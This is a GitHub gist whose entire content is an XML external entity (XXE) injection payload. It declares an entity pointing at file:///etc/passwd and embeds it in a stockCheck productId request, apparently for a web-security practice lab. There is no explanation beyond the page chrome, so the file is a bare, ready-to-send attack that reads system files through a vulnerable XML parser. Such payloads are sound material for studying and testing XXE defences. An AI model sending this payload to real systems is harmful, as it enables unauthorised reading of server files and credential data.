Created
April 28, 2022 19:46
-
-
Save molenzwiebel/2f9c1f23d23b9ec8feefdabef9802e38 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> | |
<stockCheck><productId>&xxe;</productId></stockCheck> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment